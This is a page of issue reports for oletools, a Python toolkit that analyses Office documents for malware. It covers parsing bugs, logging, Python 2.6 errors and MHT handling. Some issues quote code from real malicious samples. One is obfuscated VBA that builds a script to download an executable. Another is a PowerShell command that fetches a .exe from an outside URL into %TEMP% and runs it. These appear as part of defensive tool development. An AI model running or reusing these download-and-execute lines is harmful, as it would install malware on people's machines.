decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.

Home Page: http://www.decalage.info/python/oletools

License: Other

Batchfile 0.29% HTML 9.59% Python 89.76% VBA 0.36%
python python-library olefile malware-analysis ms-office-documents compound rtf forensics ole-files security

oletools's Issues

olevba - malware using tricks in MHT files to disrupt base64 decoding

Originally reported by: Philippe Lagadec (Bitbucket: decalage, GitHub: decalage2)


Another sample, even more twisted than the previous ones referenced in issue #31:

https://malwr.com/analysis/ZDkzYzljZTJmZDViNDFjMzk5N2IwYThhODQyYjExYjg/

source: https://isc.sans.edu/diary/Obfuscated+MIME+Files/20643

Explanation: the malware sample contains an extra line at the end of the MIME headers of the part that holds the base64-encoded MSO file, which is where the VBA macros are stored. MS Office seems to ignore that line, but Python's email package follows the RFCs strictly and treats the junk line as part of the data rather than the headers. As a result, base64 decoding of the data fails and olevba cannot extract the macros.

There is no simple workaround: this issue requires a modified version of the email package.
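
Short of patching the email package, one possible mitigation is to filter the payload before decoding it. The sketch below is only an illustration in Python 3, not olevba's actual fix: the function name is hypothetical, and it assumes the junk line contains at least one character outside the base64 alphabet (a colon or a space, for instance), which may not hold for every sample.

```python
import base64
import re

# A line made only of base64 alphabet characters, with optional padding.
_B64_LINE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')

def decode_base64_skipping_junk(payload):
    """Decode a base64 text payload, ignoring lines that are not valid base64.

    Hypothetical helper: 'payload' is the text the MIME parser returned as
    the body of the part, possibly starting with a stray header-like line.
    """
    kept = []
    for line in payload.splitlines():
        line = line.strip()
        if _B64_LINE.match(line):
            kept.append(line)
    return base64.b64decode(''.join(kept))
```

A junk line that happens to consist only of base64 characters would slip through this filter, so this is a heuristic rather than a complete answer.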


Use of Logger

Originally reported by: Anonymous


Hello:

When importing oletools.olevba while using a pre-defined logger for my application, I noticed some anomalous behavior: after invoking the VBA_Parser, every entry I wrote to my application's logfile was also written to STDERR.

To replicate this issue, I produced the following code.

#!python

#!/usr/bin/python

import sys
import logging
from oletools.olevba import VBA_Parser, VBA_Scanner
from cloghandler import ConcurrentRotatingFileHandler

# set up logger for application
dbg_h = logging.getLogger('dbg_log')
dbglog = '%s' % 'dbg.log'
dbg_rotateHandler = ConcurrentRotatingFileHandler(dbglog, "a")
dbg_h.addHandler(dbg_rotateHandler)
dbg_h.setLevel(logging.ERROR)

# read some document as a buffer
buff = sys.stdin.read()

# generate issue
dbg_h.error('Before call to module....')
vba = VBA_Parser('somedoc.doc', data=buff)
dbg_h.error('After call to module....')

When I run this, I get the following...

cat somedocument.doc | ./replicate.py
ERROR:dbg_log:After call to module....

My last dbg_h logger write attempt is getting output to the console as well as getting written to my dbg.log file. I see in your TODO you have a few comments surrounding logging. If it has not been considered already, I would like to suggest making that an option a caller can disable.
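
The duplicated output is consistent with a handler being installed on the root logger, for example by `logging.basicConfig()` or by a module-level call such as `logging.debug()`, which configures the root logger implicitly when it has no handlers. The issue does not confirm that this is what olevba does, so the following is only a sketch of the usual library-side pattern in Python 3; the logger name `olevba_sketch` is made up for the example.

```python
import logging

def get_library_logger(name='olevba_sketch'):
    """Return a named logger that never touches the root logger's setup."""
    logger = logging.getLogger(name)
    # NullHandler discards records, so the library prints nothing by itself.
    if not any(isinstance(h, logging.NullHandler) for h in logger.handlers):
        logger.addHandler(logging.NullHandler())
    return logger

log = get_library_logger()
# Nothing is printed unless the application has configured handlers itself.
log.debug('parsing started')
```

On the caller's side, setting `dbg_h.propagate = False` on the application logger should also keep its records away from any handler that ends up on the root logger.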


olevba - library update - IOC

Originally reported by: Anonymous


SHA-256 from VT: "33d4526dfba85f22397a7f21df4f4d0de445cf657ce8e2ddb44f95d24bf299ef"
olevba is not picking up the URL in the code. Parts of the MSXML2 object name are also obfuscated.

Open XPVB_FULLNAME For Output As #FileNumber1
Print #FileNumber1, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.17u.cm/incs/update.rar" + Chr(34)
Print #FileNumber1, "strTecation = " + Chr(34) + "c:" + Chr(Asc("W")) + "indows" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

 Print #FileNumber1, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
 'Print #FileNumber1, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
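
To illustrate why the URL is missed, here is a minimal Python 3 sketch that folds constant `Chr(<number>)` and `Asc("<char>")` calls and joins the resulting string literals. It is not how olevba works internally, the function names are hypothetical, and it is deliberately naive: it rewrites text without parsing VBA, and it drops anything it cannot resolve, such as `Chr(mttt)`.

```python
import re

_ASC = re.compile(r'Asc\("([^"])"\)')
_CHR = re.compile(r'Chr\((\d+)\)')
_LITERAL = re.compile(r'"((?:[^"]|"")*)"')

def _quote(text):
    """Render text as a VBA string literal (inner quotes are doubled)."""
    return '"' + text.replace('"', '""') + '"'

def fold_constant_strings(expr):
    """Resolve Chr(<number>) and Asc("<char>") calls, then join the literals."""
    previous = None
    while previous != expr:
        previous = expr
        # Chr(116) -> "t"
        expr = _CHR.sub(lambda m: _quote(chr(int(m.group(1)))), expr)
        # Asc("t") -> 116
        expr = _ASC.sub(lambda m: str(ord(m.group(1))), expr)
    # Concatenate every string literal; unresolved terms are left out.
    return ''.join(m.group(1).replace('""', '"')
                   for m in _LITERAL.finditer(expr))

line = ('"strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" '
        '+ "://www.17u.cm/incs/update.rar" + Chr(34)')
print(fold_constant_strings(line))
```

Once the expression is folded, the URL appears as one contiguous string that a pattern-based IOC search can match.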

olevba.py failing to parse ChrW code

Originally reported by: Anonymous


If the following VBA code is provided for analysis:

#!vba

test = ChrW(2016)

olevba.py fails with the following message:

    vba_chr.setParseAction(lambda t: VbaExpressionString(chr(t[0])))
ValueError: chr() arg not in range(256)

It seems to work if line 596 of olevba.py is changed to the following:

#!python

vba_chr.setParseAction(lambda t: VbaExpressionString(unichr(t[0]).encode('utf-8')))
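
The patch above targets Python 2, where `chr()` only accepts values below 256. As a hedged illustration of the same idea in Python 3, where `chr()` accepts any Unicode code point, a small hypothetical helper could look like this (the range check is an assumption about which arguments are worth accepting, not something taken from olevba):

```python
def vba_chrw(code):
    """Return the character for a non-negative 16-bit ChrW() argument."""
    if not 0 <= code <= 0xFFFF:
        raise ValueError('ChrW argument out of range: %r' % code)
    # In Python 3, chr() handles code points above 255 directly.
    return chr(code)

print(repr(vba_chrw(2016)))
```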

extracted VBA hex files from vbaproject.bin - how to extract VBA code?

Originally reported by: denfromufa (Bitbucket: denfromufa, GitHub: denfromufa)


vbaproject.bin is corrupted, but some VBA modules are recoverable. How can the VBA code be extracted from these hex files?

C:\Python\Python27\Lib\site-packages\oletools>olevba.py stream1.bin
olevba 0.44 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
ERROR    stream1.bin is not a supported file type, cannot extract VBA Macros.
?            stream1.bin - File format not supported

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, TXT=Text, M=Macros, A=Auto-exec
utable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex
 strings, V=VBA strings, ?=Unknown)

===============================================================================
FILE: stream1.bin
Type: None
No VBA macros found.

Failure to decode embedded object

Originally reported by: bsod99 (Bitbucket: bsod99, GitHub: Unknown)


olevba is unable to decode the object contained in this Dridex .doc.
The doc file that caused the error is attached.

#!python
olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename                                                         
----------- -----------------------------------------------------------------
!ERROR      ../../dredx.doc - Error -3 while decompressing data: unknown compression method

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: ../../dredx.doc
Traceback (most recent call last):
  File "olevba.py", line 1462, in process_file
    vba = VBA_Parser(filename, data)
  File "olevba.py", line 1262, in __init__
    ole_data = zlib.decompress(activemime[0x32:])
error: Error -3 while decompressing data: unknown compression method
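
The traceback shows the compressed data being read from a fixed offset (`0x32`). One way to tolerate samples where the zlib stream starts elsewhere is to fall back to scanning for a plausible zlib header. The sketch below, in Python 3, only illustrates that idea under the assumption that the stream begins with the byte `0x78`, as zlib streams with the default 32 KB window do; the function name and the fallback strategy are hypothetical.

```python
import zlib

def decompress_activemime(data, known_offsets=(0x32,)):
    """Try the known offsets first, then every position holding byte 0x78."""
    scanned = (i for i, byte in enumerate(data) if byte == 0x78)
    for start in list(known_offsets) + list(scanned):
        try:
            return zlib.decompress(data[start:])
        except zlib.error:
            # Not a valid zlib stream at this position, try the next one.
            continue
    raise ValueError('no zlib stream found')
```

The brute-force scan is slow on large files and could in theory accept an unrelated stream, so it is best kept as a last resort after the known offsets.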



Package Object Support

Originally reported by: Jeremy Humble (Bitbucket: jeremy_humble, GitHub: Unknown)


I've noticed an uptick lately in phishing campaigns sending out documents with embedded package objects (https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/packager_what_is_obj_pkg.mspx?mfr=true)

All of the attached files have executables embedded using this technique, but none of the oletools seem to be able to recognize or extract these types of objects.
I'm still researching this technique and will update this ticket if I find anything useful.

While running syria.pps through olefile, I did notice the following:

#!python

DEBUG    property id=13: type=4126 offset=108
DEBUG    property id=13: type=4126 not implemented in parser yet

DEBUG    property id=12: type=4108 offset=1D1
DEBUG    property id=12: type=4108 not implemented in parser yet

The archive password is "infected".


oletools 0.47 - issues with mraptor and olevba

oletools 0.47 has some issues:

1 - mraptor.py (0.04) gives me errors for tablestream and colorglass, so I
overwrote both folders with the ones from version 0.46 and it now works.
=> moved to issue #57

2 - olevba.py --decode option is not extracting the content of a
UserForm. VBA FORM STRING is missing.
=> now moved to issue #60.

3 - when running mraptor:

local variable 'modulename_unicode_modulename_unicode'  referenced before assignment - triggered in olevba

4 - olevba:

ERROR    Unhandled exception in main: 'ProcessingError' object has no attribute 'orig_exception'
Traceback (most recent call last):
  File "/usr/local/bin/olevba", line 3292, in main
    print '%-12s %s - %s' % ('!ERROR', filename, exc.orig_exception)
AttributeError: 'ProcessingError' object has no attribute 'orig_exception'

olevba - Add support for MHT files with macros

Originally reported by: Philippe Lagadec (Bitbucket: decalage, GitHub: decalage2)


Greg (from SpamStopsHere) reported several recent malicious samples using the MHT format (MIME HTML), running VBA macros when opened in Word:

These MHT files can be created from Word, using the format "Single File Web Page - .mht (MHTML)". The resulting file is a MIME container, similar to an e-mail. It contains several files as attachments, including the Word document in XML format.

By default, MHT files are opened by Internet Explorer, which does not run macros. But if the file is renamed to ".doc", it will be opened in Word and macros can run as if it were a normal Word document.

If VBA macros are present, they are attached as a binary file named "editdata.mso", encoded in Base 64. This looks very similar to the Word 2003 XML format, already supported by olevba.

It should then be straightforward to add support for MHT files with VBA macros.
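
As a rough illustration of that approach, the following Python 3 sketch walks the MIME parts with the standard email package and returns the decoded payload of any part that looks like an MSO attachment. It assumes the attachment can be recognized by a `Content-Location` header ending in `.mso`, which is an assumption not stated in this issue, and the function name is hypothetical.

```python
import email

def find_mso_parts(mht_bytes):
    """Yield (location, decoded_bytes) for MIME parts that look like MSO files."""
    message = email.message_from_bytes(mht_bytes)
    for part in message.walk():
        # Assumption: the attachment is identified by its Content-Location.
        location = part.get('Content-Location', '')
        if location.lower().endswith('.mso'):
            # decode=True undoes the base64 Content-Transfer-Encoding.
            yield location, part.get_payload(decode=True)
```

The decoded bytes would then still need the same ActiveMime handling that is applied to the MSO data found in Word 2003 XML files.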


olevba - zipfile-related python errors in python 2.6

Originally reported by: chazomaticus (Bitbucket: chazomaticus, GitHub: chazomaticus)


It looks like the code in olevba.py:1371 relies on zipfile.is_zipfile handling file-like objects in addition to filenames. That functionality was added in python 2.7. As a result, this code:

from oletools.olevba import VBA_Parser
z = 'empty.zip'
print VBA_Parser(z, data=open(z, 'rb').read()).detect_vba_macros()

prints 'False' in python 2.7, but produces this error in python 2.6:

Traceback (most recent call last):
  File "test.py", line 4, in <module>
    print VBA_Parser(z, data=open(z, 'rb').read()).detect_vba_macros()
  File "/usr/lib/python2.6/site-packages/oletools/olevba.py", line 1371, in __init__
    elif zipfile.is_zipfile(_file):
  File "/usr/lib64/python2.6/zipfile.py", line 134, in is_zipfile
    fpin = open(filename, "rb")
TypeError: coercing to Unicode: need string or buffer, cStringIO.StringI found

Any non-OLE file will trigger the error in python 2.6; the empty.zip file in the example is attached for thoroughness.

It may be that when VBA_Parser is passed the data itself, zip detection/parsing simply won't work under python 2.6. I haven't looked too closely at the code around zipfile.is_zipfile there, but I suspect something could be done to at least prevent the exception from being thrown.
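
One way to avoid depending on how `zipfile.is_zipfile` treats file-like objects is to attempt to open the archive and catch the failure. The sketch below is written for Python 3 and is only an illustration with a hypothetical function name; on Python 2.6 the same idea would need `zipfile.BadZipfile` and an explicit `close()` instead of the `with` statement.

```python
import io
import zipfile

def data_is_zip(data):
    """Return True if the given bytes can be opened as a zip archive."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)):
            return True
    except zipfile.BadZipFile:
        return False
```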


MSO Issues

Originally reported by: Anonymous


I was running 58024109295a9f48b52bec10f81570c9 through olevba today and noticed it seems to be missing some things. It dumps out the following:

#!text

VBA MACRO ThisDocument.cls
in file: None - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Document_Open()
dsfsdff
End Sub

-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: None - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sub dsfsdff()
ahvd = rddchgvjj.TextBox1
Shell ahvd, vbHide
End Sub

-------------------------------------------------------------------------------
VBA MACRO rddchgvjj.frm
in file: None - OLE stream: u'VBA/rddchgvjj'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)

It's pretty obviously running a shell command stored in rddchgvjj.TextBox1, but I think not all of rddchgvjj.frm is being dumped. If we dump out what olevba is seeing, we get this:

#!vba

Attribute VB_Name = "rddchgvjj"
Attribute VB_Base = "0{26E75ED9-CC6B-4519-8536-3769EE134A13}{073AADD7-1DDD-4AF3-97FA-10D8D7610A7F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

This doesn't tell us anything about TextBox1 though. I made a quick patch to olevba to output the entire extracted MSO contents and, skimming through, I see the following:

#!text

[Workspace]^M
ThisDocument=50, 50, 878, 619, ^M
Module1=25, 25, 853, 594, ^M
rddchgvjj=125, 125, 953, 694, , 75, 75, 903, 644,

Shortly after (along with a bunch of nulls and other binary data):

#!text

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://strawberry.reactionpointtimingindicator.com/zalupa/kurva.php','%TEMP%\sdjgbcjkds.exe');Start-Process '%TEMP%\sdjgbcjkds.exe'

Which is exactly what I wanted. I'm not sure if this is actually an object that is being missed or what exactly is going on here for certain. If this isn't actually an object being missed, but is something else, could there maybe be an option to dump the raw decompressed ActiveMime content? That way we can at least do some string searching on the output.

I can submit a pull request for that feature if that would help.

Thanks!
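
A raw dump of this kind could be approximated outside olevba. The following Python 3 sketch decompresses the ActiveMime data and lists printable ASCII strings, similar to the Unix `strings` tool. The offset `0x32` is the one olevba passes to `zlib.decompress` in the 0.25 traceback quoted elsewhere on this page; the function name and the minimum length are arbitrary choices made for the example.

```python
import re
import zlib

def activemime_strings(activemime, offset=0x32, min_len=6):
    """Decompress ActiveMime data and return its printable ASCII strings."""
    raw = zlib.decompress(activemime[offset:])
    # Runs of at least min_len printable ASCII characters.
    pattern = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    return [m.group().decode('ascii') for m in pattern.finditer(raw)]
```

Strings stored as UTF-16 would not be found by this pattern, so a fuller version would search for both encodings.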


Handle junk at beginning of MIME MSO file

Originally reported by: Anonymous


For example, some new malicious doc files spammers sent out today had this at the beginning:

sssssssssss
MIME-Version: 2
Content-Type: multipart/related; boundary="----=_NextPart_E15iCSkeR03C.BZkNNxTU658"

Removing "sssssssssss" from the file allows olevba to parse it correctly.

Sample can be downloaded from here:

https://malwr.com/analysis/YWYyYzViMTkxNWNjNGYxZWFjZDI1ZjAxMjk2MWY5ZDg/
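
The manual fix described above can be sketched as a pre-processing step. This Python 3 example drops everything before the first line that starts with `MIME-Version:`. It assumes that this header is present and is the first genuine header, as in the sample quoted here; the function name is hypothetical.

```python
import re

# First line that starts with the MIME-Version header, in any letter case.
_MIME_START = re.compile(rb'^MIME-Version:', re.IGNORECASE | re.MULTILINE)

def strip_leading_junk(data):
    """Remove any bytes that precede the MIME-Version header line."""
    match = _MIME_START.search(data)
    # Leave the data untouched when no MIME-Version header is found.
    return data[match.start():] if match else data
```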


olevba - remove output to stderr

Originally reported by: Philippe Lagadec (Bitbucket: decalage, GitHub: decalage2)


olevba in oletools 0.12 takes more time to analyze files because it includes a VBA parser. Therefore I added a temporary message "analysis..." on the console. I did not want it to appear in the output if redirected to a file, so I wrote it to stderr.

In some cases such as running olevba from powershell, this causes issues because it can be considered as reporting an actual error.

Possible solutions:

  • remove that message
  • write the message to stdout
  • add an option to disable that message.

Invalid CompressedChunkSignature in VBA compressed stream

Originally reported by: Anonymous


#!code

cuckoo@cuckoo-process:/tmp/decalage-oletools-d3c1e4fd0bb0/oletools$ python olevba.py bad.xls
olevba 0.42 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
!ERROR       bad.xls - Invalid CompressedChunkSignature in VBA compressed stream

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, TXT=Text, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)

===============================================================================
FILE: bad.xls
Type: OLE
No suspicious keyword or IOC found.

cuckoo@cuckoo-process:/tmp/decalage-oletools-d3c1e4fd0bb0/oletools$ md5sum bad.xls
d838f59f1c8769fbf4cff10f73255c0a  bad.xls

olefile doesn't handle corrupted? streams

Originally reported by: Anonymous


#!text

Traceback (most recent call last):
  File "/opt/cuckoo/lib/cuckoo/core/plugins.py", line 194, in process
    data = current.run()
  File "/opt/cuckoo/modules/processing/static.py", line 729, in run
    static = Office(self.file_path).run()
  File "/opt/cuckoo/modules/processing/static.py", line 706, in run
    results = self._parse(self.file_path)
  File "/opt/cuckoo/modules/processing/static.py", line 650, in _parse
    for (subfilename, stream_path, vba_filename, vba_code) in vba.extract_macros():
  File "/opt/cuckoo/lib/cuckoo/common/office/olevba.py", line 1611, in extract_macros
    for stream_path, vba_filename, vba_code in _extract_vba(self.ole_file, vba_root, project_path, dir_path):
  File "/opt/cuckoo/lib/cuckoo/common/office/olevba.py", line 631, in _extract_vba
    project = ole.openstream(project_path)
  File "/opt/cuckoo/lib/cuckoo/common/office/olefile.py", line 1922, in openstream
    return self._open(entry.isectStart, entry.size)
  File "/opt/cuckoo/lib/cuckoo/common/office/olefile.py", line 1816, in _open
    size_ministream, force_FAT=True)
  File "/opt/cuckoo/lib/cuckoo/common/office/olefile.py", line 1825, in _open
    filesize=self._filesize)
  File "/opt/cuckoo/lib/cuckoo/common/office/olefile.py", line 816, in __init__
    raise IOError('OLE stream size is less than declared')
IOError: OLE stream size is less than declared

Hash: fb4e7560fce968cc88f4931c6d44f095

The sample is attached; it is not defanged. It runs fine in Word 2010.


olevba macro extraction fails when module name = "text"

Originally reported by: Philippe Lagadec (Bitbucket: decalage, GitHub: decalage2)


Issue reported by @nks0ne in pull request #3:

Extraction fails when MODULENAME_ModuleName is "text".

#!text

Traceback (most recent call last):
None
  File "C:/Users/nks0ne/PycharmProjects/vbadump/main.py", line 56, in cloneRepo
    dumpVBA(filename,"./work/work3/vba_out",author,date_of_change)
  File "C:/Users/nks0ne/PycharmProjects/vbadump/main.py", line 69, in dumpVBA
    for (filename, stream_path, vba_filename, vba_code, meta) in vba.extract_macros():
  File "C:\Python27\lib\site-packages\oletools\olevba.py", line 1042, in extract_macros
    for results in ole_subfile.extract_macros():
  File "C:\Python27\lib\site-packages\oletools\olevba.py", line 1049, in extract_macros
    for stream_path, vba_filename, vba_code, meta in _extract_vba(self.ole_file, vba_root, project_path, dir_path, meta):
  File "C:\Python27\lib\site-packages\oletools\olevba.py", line 746, in _extract_vba
    filext = code_modules[MODULENAME_ModuleName]
KeyError: 'text'

Potential solution: use a default file extension when MODULENAME_ModuleName is not found in code_modules.
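
A minimal sketch of that suggestion, in Python 3: look the module name up with `dict.get` so that an unknown name yields a fallback instead of a `KeyError`. The helper name and the fallback value `'bin'` are arbitrary choices for the example, not taken from olevba.

```python
def module_extension(code_modules, module_name, default='bin'):
    """Return the file extension for a module, or a default if unknown."""
    # dict.get avoids the KeyError raised by code_modules[module_name].
    return code_modules.get(module_name, default)

code_modules = {'ThisDocument': 'cls', 'Module1': 'bas'}
print(module_extension(code_modules, 'text'))
```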

